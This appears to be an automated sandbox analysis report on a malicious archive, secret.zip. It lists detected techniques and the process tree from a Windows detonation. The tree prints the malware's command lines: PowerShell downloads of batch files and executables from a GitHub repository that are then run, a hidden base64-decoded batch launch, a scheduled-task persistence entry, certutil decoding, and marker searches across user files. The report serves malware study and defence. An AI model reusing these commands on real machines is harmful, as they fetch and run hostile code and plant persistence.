Analysis Overview
SHA256
f41e468b671f59a1cdaf868e4dc91106e341bdce5cad41d01c151d0e7ebcd9d1
Threat Level: Likely malicious
The file secret.zip was found to be: Likely malicious.
Malicious Activity Summary
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Drops startup file
Deobfuscate/Decode Files or Information
Legitimate hosting services abused for malware hosting/C2
Drops file in System32 directory
Sets desktop wallpaper using registry
Drops file in Windows directory
Browser Information Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Scheduled Task/Job: Scheduled Task
Enumerates system info in registry
Modifies registry class
Views/modifies file attributes
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported
2025-05-15 08:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2025-05-15 08:29
Reported
2025-05-15 08:35
Platform
win11-20250502-en
Max time kernel
324s
Max time network
330s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\regstartup32.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft-Edge\Rar.exe | N/A |
Deobfuscate/Decode Files or Information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\certutil.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\balls.bat | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ANCVirus.png" | C:\Windows\system32\reg.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SystemTemp | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\findstr.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133917717166453887" | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-330179853-1108322181-418488014-1000_Classes\Local Settings\MuiCache | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{48A23430-6D71-4A0F-9358-81C0CFDFB29D} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-330179853-1108322181-418488014-1000\{977BB5F3-E485-4AB6-927C-1A2E4E3A0765} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\secret.zip
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_secret.zip\rembotperm.exe"
C:\Windows\system32\schtasks.exe
schtasks /Create /SC ONLOGON /RL HIGHEST /TN EmbeddedAppTask /TR C:\Users\Admin\AppData\Local\Temp\svchost.exe /F
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Users\Admin\AppData\Local\Temp\svchost.exe
C:\Windows\system32\cmd.exe
cmd /C "Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat \" -OutFile \"balls.bat\""
C:\Windows\system32\cmd.exe
cmd /C "powershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\""
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Invoke-WebRequest -Uri \"https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/balls.bat\" -OutFile \"balls.bat\"
C:\Windows\system32\cmd.exe
cmd /C balls.bat
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "$Base64 = '[base64 payload not preserved]'; $TempFile = [System.IO.Path]::Combine($env:TEMP, (Get-Random).ToString() + '.bat'); [System.IO.File]::WriteAllBytes($TempFile, [System.Convert]::FromBase64String($Base64)); Start-Process -WindowStyle Hidden -FilePath $TempFile"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1945869879.bat" "
C:\Windows\system32\mshta.exe
mshta.exe "C:\Windows\System32\balls.bat"
(21 instances of this process were recorded)
C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\Microsoft-Edge"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\Microsoft-Edge\updater.bat"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Microsoft-Edge\updater.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "& {Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/main/don/Rar.exe' -OutFile '"C:\Users\Admin\Microsoft-Edge\Rar.exe"'}"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/ANCVirus.rar' -OutFile '"C:\Users\Admin\Microsoft-Edge\tmp.rar"'"
C:\Users\Admin\Microsoft-Edge\Rar.exe
"C:\Users\Admin\Microsoft-Edge\Rar" x -pANConTOP "C:\Users\Admin\Microsoft-Edge\tmp.rar" "C:\Users\Admin\Microsoft-Edge"
C:\Windows\system32\certutil.exe
certutil -decode "C:\Users\Admin\AppData\Local\Temp\15623_3106930297.tmp" "C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\161_2266215697\EpicGames.cmd" "
C:\Windows\system32\attrib.exe
attrib +h "C:\Users\Admin\ANC"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Start-Process '"C:\Users\Admin\ANC\payload.bat"' -WindowStyle Hidden"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\ANC\payload.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Invoke-WebRequest -Uri 'https://i.imgur.com/4A1D39J.png' -OutFile 'C:\Users\Admin\AppData\Local\Temp\ANCVirus.png' -ErrorAction SilentlyContinue"
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\ANCVirus.png" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "10" /f
C:\Windows\system32\reg.exe
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters 1, True
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\AssertSplit.jpeg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\BlockExport.mp4"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ClearLimit.eprtx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ConvertFromPing.potm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\CopyEnter.sql"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ImportExit.temp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\InitializeTest.crw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\Microsoft Edge.lnk"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PingShow.mpe"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ProtectLimit.jfif"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\PublishGroup.xlsb"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ReceiveWatch.clr"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RepairWrite.midi"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResetInstall.dotx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeClose.rm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\ResizeUnlock.xps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\RestorePush.au3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SaveInitialize.au3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SendUnlock.docx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SkipFind.vdw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SplitImport.docx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\StepGrant.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\SubmitStep.MOD"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\TestBlock.zip"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnlockUninstall.wmx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnpublishDismount.txt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterConfirm.vdw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UnregisterStop.jtx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateReceive.ttc"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\UpdateRegister.ttf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Desktop\WatchDismount.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\AssertRequest.vsd"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\BlockSearch.pub"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\CompressSkip.xlsx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ConvertUndo.xltm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyBlock.pot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyDisable.vsdm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DenyJoin.pptm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\DisableResize.xlsb"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ExportReceive.pub"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\FindProtect.dot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\GrantImport.xlsm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\HideReceive.htm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasureDebug.pptx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MeasurePing.ods"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MergePush.vdx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountMerge.pptm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\MountPop.odp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OutTest.dot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RedoApprove.pot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RenameMerge.vstx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RepairWait.ods"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResizeInitialize.xlsx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResolveSuspend.dot"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ResumeJoin.csv"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\RevokeRead.vdw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SaveDebug.odt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchExport.vsdm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SearchStop.vsdm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SetSync.odp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\ShowStop.vdx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipExport.pptx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SkipRestore.pdf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\StepConnect.mht"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\SuspendUnprotect.txt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UndoInitialize.xlsb"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UninstallGet.txt"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\UnpublishLock.pptm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\WriteLimit.ods"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\Quick Notes.one"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Open Notebook.onetoc2"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Documents\OneNote Notebooks\My Notebook\Quick Notes.one"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CloseNew.rm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\CopyImport.ADTS"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSend.cab"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DebugSplit.rtf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\DenyWait.xml"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\FindCompress.xht"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\LimitExit.mht"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewBlock.mpeg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\NewPublish.temp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ReceiveRedo.ico"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RegisterDismount.kix"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\RequestClose.ttc"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\ResetExpand.jfif"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchClear.wma"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\SearchMerge.xla"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\StepShow.html"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnblockCheckpoint.ico"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Music\UnregisterProtect.ram"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupDismount.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\BackupUndo.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearLock.cr2"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ClearMount.dib"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompleteUnprotect.dxf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\CompressSkip.dib"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromExport.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertFromSkip.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ConvertToNew.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\DebugMerge.dib"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EditSubmit.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\EnterRename.tiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportOut.wmf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ExportUninstall.gif"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GetLimit.emf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\GroupRevoke.emz"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\InstallResize.wmf"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\LockDisconnect.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\MoveDismount.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\My Wallpaper.jpg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\PushHide.emz"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RemoveCompare.tiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\RepairUnregister.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\ResolveWrite.bmp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SaveOpen.emz"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SearchInvoke.png"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StartEnter.raw"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\StepUninstall.jpeg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SubmitResolve.png"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\SuspendShow.bmp"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\TestRestart.svg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UndoSkip.eps"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallClear.dwg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Pictures\UninstallResolve.svg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertPush.zip"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\AssertUndo.au3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearSuspend.ppsm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ClearWait.mp3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\CompareRepair.xltx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConfirmCopy.svg"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectInstall.mp3"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConnectLimit.tiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ConvertToOpen.fon"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\DisconnectDisable.zip"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\EditOut.xml"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExitOpen.vsdx"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExpandAdd.aiff"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\ExportConvertTo.clr"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GetUninstall.xltm"
C:\Windows\system32\findstr.exe
findstr /c:"::ANC.Virus.69420" "C:\Users\Admin\Downloads\GroupExport.snd"
